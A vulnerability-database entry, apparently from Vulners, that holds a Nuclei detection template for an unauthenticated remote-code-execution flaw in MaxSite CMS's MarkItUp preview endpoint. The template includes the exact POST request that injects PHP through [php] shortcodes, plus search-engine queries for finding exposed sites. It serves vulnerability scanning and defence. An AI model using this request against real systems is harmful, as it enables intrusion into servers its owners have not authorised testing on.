Lucene search
+L

MaxSite CMS <=109.1 - Remote Code Execution

🗓️ 04 Sep 2026 02:04:28Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 12 Views

MaxSite CMS <=109.1 unauthenticated RCE via eval() on [php] shortcodes in preview-ajax.php.

Related
Refs
Code
ReporterTitlePublishedViews
Family
githubexploit
GithubExploit
Exploit for CVE-2026-3395
1 Mar 202621:19
githubexploit
attackerkb
ATTACKERKB
CVE-2026-3395
1 Mar 202614:02
attackerkb
circl
Circl
CVE-2026-3395
1 Mar 202605:31
circl
cnnvd
CNNVD
MaxSite CMS 代码注入漏洞
1 Mar 202600:00
cnnvd
cve
CVE
CVE-2026-3395
1 Mar 202614:02
cve
cvelist
Cvelist
CVE-2026-3395 MaxSite CMS MarkItUp Preview AJAX Endpoint preview-ajax.php eval code injection
1 Mar 202614:02
cvelist
euvd
EUVD
EUVD-2026-9130
1 Mar 202614:02
euvd
kitploit
Kitploit
CVE-2026-3395-MaxSite-CMS-Unauthenticated-RCE
3 Sep 202601:49
kitploit
kitploit
Kitploit
CVE-2026-3395-Lab
3 Sep 202602:03
kitploit
kitploit
Kitploit
cms-exploitation-campaign
4 Sep 202603:10
kitploit
Rows per page
id: CVE-2026-3395

info:
  name: MaxSite CMS <=109.1 - Remote Code Execution
  author: ritikchaddha
  severity: high
  description: |
    MaxSite CMS through 109.1 allows unauthenticated remote attackers to execute arbitrary code via the MarkItUp editor preview AJAX endpoint, preview-ajax.php. The endpoint insufficiently authenticates the request, failing to ensure the user is logged in, and processes the attacker's input via unsafe usage of PHP eval() on user-supplied [php]...[/php] shortcodes. By providing a POST request to the vulnerable /ajax/ endpoint with crafted input, attackers may achieve remote code execution. The issue is addressed in version 109.2 by implementing proper authentication controls.
  reference:
    - https://github.com/mbanyamer/CVE-2026-3395-MaxSite-CMS-Unauthenticated-RCE
    - https://github.com/rootdirective-sec/CVE-2026-3395-Lab
    - https://github.com/maxsite/cms/commit/08937a3c5d672a242d68f53e9fccf8a748820ef3
    - https://vuldb.com/?id.348281
    - https://www.cyber.gov.au/about-us/view-all-content/alerts-and-advisories/large-scale-exploitation-campaign-targeting-website-content-management-systems-cms
    - https://nvd.nist.gov/vuln/detail/CVE-2026-3395
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
    cvss-score: 7.3
    cve-id: CVE-2026-3395
    epss-score: 0.0388
    epss-percentile: 0.89497
    cwe-id: CWE-94
  metadata:
    verified: true
    max-request: 2
    vendor: max-3000
    product: maxsite_cms
    shodan-query: "MaxSite CMS"
    fofa-query: "MaxSite CMS"
    publicwww-query: "MaxSite CMS"
  tags: cve,cve2026,rce,maxsite,cms,eval,vkev

flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}"

    matchers:
      - type: word
        part: body
        words:
          - "MaxSite CMS"
          - "maxsite_cms"
          - "max-3000.com"
          - "/maxsite/"
        case-insensitive: true
        internal: true

  - raw:
      - |
        POST /ajax/YWRtaW4vcGx1Z2lucy9lZGl0b3JfbWFya2l0dXAvcHJldmlldy1hamF4LnBocA== HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        X-Requested-With: XMLHttpRequest

        data=%5Bphp%5Decho+md5%28%27cve-2026-3395-nuclei%27%29%3B%5B%2Fphp%5D

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "a92788d6874137d1c4c4eaf6b6c0806a"

      - type: status
        status:
          - 200
# digest: 4a0a0047304502205a65bd154dd0db648483b1a2d9e3db6c6c053c4ee0fdf68ca8001a7ea21081de022100cf834c769e0e8853fa91aa600871a75790d14283ea08b851d12e5a995f3be228:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

13 Aug 2026 08:20Current
7.6High risk
Vulners AI Score7.6
CVSS 3.17.3 - 9.8
CVSS 46.9
CVSS 27.5
CVSS 37.3
EPSS0.0388
SSVC
12